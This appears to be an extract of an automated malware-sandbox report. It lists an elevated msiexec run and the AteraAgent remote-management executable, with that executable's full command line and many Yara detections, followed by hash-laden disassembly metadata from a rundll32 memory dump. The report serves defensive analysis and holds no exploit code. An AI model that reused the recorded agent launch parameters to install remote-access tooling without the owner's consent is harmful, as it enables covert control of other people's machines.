                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:11:20:29
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C5D300CFA650AF8B39098EE9450EC910 E Global\MSI0000
                                                                                                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                                                                                                        File size:59'904 bytes
                                                                                                                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:11:20:30
                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 3757c761-9e50-4f15-8086-0e584dceea48 "536561ff-dfee-40bc-945b-5b9b9c53fde8" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000MHGA9IAP
                                                                                                                                                                                                                                        Imagebase:0x13261b10000
                                                                                                                                                                                                                                        File size:396'336 bytes
                                                                                                                                                                                                                                        MD5 hash:B50005A1A62AFA85240D1F65165856EB
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2249867867.0000013261C00000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262BDD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262A64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262782000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.00000132624F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.000001326286F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.00000132627E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262B58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2461571892.000001327BD65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2463729683.000001327BD78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262778000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2467763966.000001327BEBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261DC6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2451097545.000001327ADB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2464216843.000001327BD89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262982000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261D8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261D48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2557424095.00007FFB03050000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261D5B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2464450216.000001327BD8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.000001326278B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262B98000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.00000132625D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262BE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262A9D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2461327312.000001327BB67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262BA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2251027525.0000013261D40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2268549247.0000013262000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2271722102.0000013262915000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003D.00000002.2557688468.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 04EF1080 Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$Items$rer<System.Object>.Equals$ructor
                                                                                                                                                                                                                                          • API String ID: 0-1247952544
                                                                                                                                                                                                                                          • Opcode ID: 59909727c3b9f6b197194f689bdbad5d68966ae3dd5de6a46e089b6b6d4f6ecc
                                                                                                                                                                                                                                          • Instruction ID: f699b13b0678677921b11e061572bf9df008e18c5042e9455cd9a26766fde820
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59909727c3b9f6b197194f689bdbad5d68966ae3dd5de6a46e089b6b6d4f6ecc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B71D831F00218DFEB149BB5DC54BAEB6E7AFC8204F189069E606EB390DE74EC129740
                                                                                                                                                                                                                                          Function 04EF0C1C Relevance: 5.2, Strings: 4, Instructions: 151COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$ructor$t_ProcessExtensionDataNames${0}.
                                                                                                                                                                                                                                          • API String ID: 0-496294683
                                                                                                                                                                                                                                          • Opcode ID: 5e915996b0e2aa7a8d1336285e0438449a256841d015ab059159d0ae0f75d627
                                                                                                                                                                                                                                          • Instruction ID: eb76c84093e09bde7353c2dc226f62323ecd4ef04158cbc05bcec6867e7bb74c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e915996b0e2aa7a8d1336285e0438449a256841d015ab059159d0ae0f75d627
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9251B535B04248EFEB08DB64E8747AE7BB6EFC9314F144429D606E7381DE796C068791
                                                                                                                                                                                                                                          Function 04EF2644 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$aScriptUtils$ructor$zingCallbacks
                                                                                                                                                                                                                                          • API String ID: 0-790695898
                                                                                                                                                                                                                                          • Opcode ID: d6076c0f4378483cb7ed48de6435770f7101bbcc294887e8b8bec9e3d2561e66
                                                                                                                                                                                                                                          • Instruction ID: 739ccadb96b3e62433213b266c33e2bfda53fc95992b6f91e7e09f44e99a46a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6076c0f4378483cb7ed48de6435770f7101bbcc294887e8b8bec9e3d2561e66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E313B21B083440FFB296B356C6437E3BA7CFC2258F0894BACB41CB386DE69AC464355
                                                                                                                                                                                                                                          Function 04EF23B8 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Items$rer<System.Object>.Equals
                                                                                                                                                                                                                                          • API String ID: 0-2618918241
                                                                                                                                                                                                                                          • Opcode ID: f91cdb378b8595a067dd32e0450506e8902a2d52e16df50dcd60c8fdef74f5a4
                                                                                                                                                                                                                                          • Instruction ID: 6cb8fd1d3ab555c29e26a2bef5cff056ec02729bf588d46e92336026f1d5a189
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f91cdb378b8595a067dd32e0450506e8902a2d52e16df50dcd60c8fdef74f5a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A511535B05215CFDB14CF68D890A6ABBB5FF45318B2581E9D618CB362DB72EC42C781
                                                                                                                                                                                                                                          Function 04EF1630 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $q$$q
                                                                                                                                                                                                                                          • API String ID: 0-3126353813
                                                                                                                                                                                                                                          • Opcode ID: 89d7a3bd3216650a60b857e7bea37c98b2f036d4b60b0eead56f6dd5ce166f12
                                                                                                                                                                                                                                          • Instruction ID: 9a53b610e60bfcd40ef62ab9bfdcfdf1dbb25742d6ee967b178086acb3ffd0a1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89d7a3bd3216650a60b857e7bea37c98b2f036d4b60b0eead56f6dd5ce166f12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC51CF35B012089FDB15DF79D8506AEBBA6BFC9350B14816AE619DB390DA30AD02CB90
                                                                                                                                                                                                                                          Function 04EF1A48 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: aScriptUtils$ructor
                                                                                                                                                                                                                                          • API String ID: 0-4050627021
                                                                                                                                                                                                                                          • Opcode ID: 836b7a21d70e0aa44288ad63a51f535ffb3b535c6a8e9044c14d1186c161d88c
                                                                                                                                                                                                                                          • Instruction ID: a6df4eac072ef194007c2253d376be33ee3fb2e2358e0fc900a48c2eadeb42a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 836b7a21d70e0aa44288ad63a51f535ffb3b535c6a8e9044c14d1186c161d88c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA317936B04248EFD30D9A787C3536EBB679BC23517099066C344CF396DC29AC1283D5
                                                                                                                                                                                                                                          Function 04EF0F30 Relevance: 2.5, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: convert to integer: {0}.$ructor
                                                                                                                                                                                                                                          • API String ID: 0-2755712084
                                                                                                                                                                                                                                          • Opcode ID: 5a275e4ebbc4c308555acd8deccbb58752a2c315207fb691546b2218b89cfd11
                                                                                                                                                                                                                                          • Instruction ID: 3dafd88f70176ffb3961bd1dc3d575f3b2bacda33eac0cc75ab19a0fd45d0f6b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a275e4ebbc4c308555acd8deccbb58752a2c315207fb691546b2218b89cfd11
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0E20171E3994FE71E67391C2025D2B715F8360474A98DBC509DB292DC099C0A43EB
                                                                                                                                                                                                                                          Function 04EF1050 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • rer<System.Object>.Equals, xrefs: 04EF10E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: rer<System.Object>.Equals
                                                                                                                                                                                                                                          • API String ID: 0-2176274148
                                                                                                                                                                                                                                          • Opcode ID: 15f7a4034a2945279359346a27c60295ac8a342f40cd31749961ff4b7f79e924
                                                                                                                                                                                                                                          • Instruction ID: 275c59ce31cff9c5cdf189235d7081972fa2cf34369aa21635ed4ba5734ecbae
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15f7a4034a2945279359346a27c60295ac8a342f40cd31749961ff4b7f79e924
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE21F832F01218DBEB149E759C607EDB7AADFC4245F04403ADA06D7345EE75ED0A8791
                                                                                                                                                                                                                                          Function 04EF0F20 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: osition {1}
                                                                                                                                                                                                                                          • API String ID: 0-3170769461
                                                                                                                                                                                                                                          • Opcode ID: bf1c641e5171685257335ecef5b26691eb435409fde6d14c9817de86b9843be2
                                                                                                                                                                                                                                          • Instruction ID: d214bb3d88dc430f8a069c3ad76810e7d4335f7553622fc19e2ed11cfc5658bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf1c641e5171685257335ecef5b26691eb435409fde6d14c9817de86b9843be2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92016D3AB093589BEB2917756C6432FAF569FC1654F0494AADB09C7301EE289C0182A5
                                                                                                                                                                                                                                          Function 04EF1958 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • API String ID: 0-4104394713
                                                                                                                                                                                                                                          • Opcode ID: d53c9536bd471b69aa00fe62d6cd0861a8dd9107d4366d45b826c5f407d4dbef
                                                                                                                                                                                                                                          • Instruction ID: 4813d8404bbcb1a60e62596cabe932a91c6c6696628605cb3961547447fdabbe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d53c9536bd471b69aa00fe62d6cd0861a8dd9107d4366d45b826c5f407d4dbef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE114235A00215FFD704DFA4E4B46AA7BB6EF8C311F104419D505A3340DF799C56DB90
                                                                                                                                                                                                                                          Function 04EF1968 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • API String ID: 0-4104394713
                                                                                                                                                                                                                                          • Opcode ID: 134d21c54774f02b43369b1d8b55e14b166b4d8e33d7ec9c64c494cc86a3e40f
                                                                                                                                                                                                                                          • Instruction ID: 95f1b486cae69f9f8dad4788552e85b65dc23194ff4426642cee1dd6a77b86e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 134d21c54774f02b43369b1d8b55e14b166b4d8e33d7ec9c64c494cc86a3e40f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311FB35E00219FFDB08DF64E874AAABBB6EF8C311F144419E50AA7380DB799C55CB94
                                                                                                                                                                                                                                          Function 04EF1440 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • API String ID: 0-4104394713
                                                                                                                                                                                                                                          • Opcode ID: 6d74d1b98f1f82eb7992ccbd8f428604071404b554d8d6fef9d48b86490bb99a
                                                                                                                                                                                                                                          • Instruction ID: dd42501fe5194d42708e420e10fde142e56bab089cb842554f0b86940ea58470
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d74d1b98f1f82eb7992ccbd8f428604071404b554d8d6fef9d48b86490bb99a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C01D470F093089FD7099F3878752167FEAEFC120430508AAC64ACF292ED15DC0A87D1
                                                                                                                                                                                                                                          Function 04EF1829 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: {0}.
                                                                                                                                                                                                                                          • API String ID: 0-4283832165
                                                                                                                                                                                                                                          • Opcode ID: ad39620081c0d2437eed3e71e5ab92e87b9f2b0d00d7f142fb49091fd4c843ce
                                                                                                                                                                                                                                          • Instruction ID: 0a25e64b86bc2c391f030b89bd4ecff79af020b0df49e6c06f3f10ce9644d8a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad39620081c0d2437eed3e71e5ab92e87b9f2b0d00d7f142fb49091fd4c843ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9901D131B1021987EB18ABA88A643FEB7B79B88708F50412DC601B7381CE712D0697D1
                                                                                                                                                                                                                                          Function 04EF2664 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: UniversalTicks
                                                                                                                                                                                                                                          • API String ID: 0-854640773
                                                                                                                                                                                                                                          • Opcode ID: 9a3907643f5a7aac420dc5f97da78589db95289292f0413a53c79c6946ae05ea
                                                                                                                                                                                                                                          • Instruction ID: 7828975b460c34bdb909211a70aee063bbb432771494c279f5edd12695605467
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a3907643f5a7aac420dc5f97da78589db95289292f0413a53c79c6946ae05ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF0C93AA193406FF700276478683DD7F79CB03128F4560E7CB04C6103DE29980A4384
                                                                                                                                                                                                                                          Function 04EF1431 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1311288626.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_4ef0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: t_ProcessExtensionDataNames
                                                                                                                                                                                                                                          • API String ID: 0-4104394713
                                                                                                                                                                                                                                          • Opcode ID: c9819822b505f0a58d6c7e9baf949fa8ab729c488a04ed3a2b0f7f9f7725580b
                                                                                                                                                                                                                                          • Instruction ID: b656666684e200d721e327fa57c9783bceea5026c09890c87f6567392104e773
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9819822b505f0a58d6c7e9baf949fa8ab729c488a04ed3a2b0f7f9f7725580b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACF06D70F04309AFEB095E74647521A7B9AEEC1259316182ECB46CF290E92AD805C7D2
                                                                                                                                                                                                                                          Function 04EF2654 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • ystem.Collections.Generic.IEqualityComparer<System.Object>.Equals, xrefs: 04EF2654
                                                                                                                                                                                                                                          Memory Dump Source
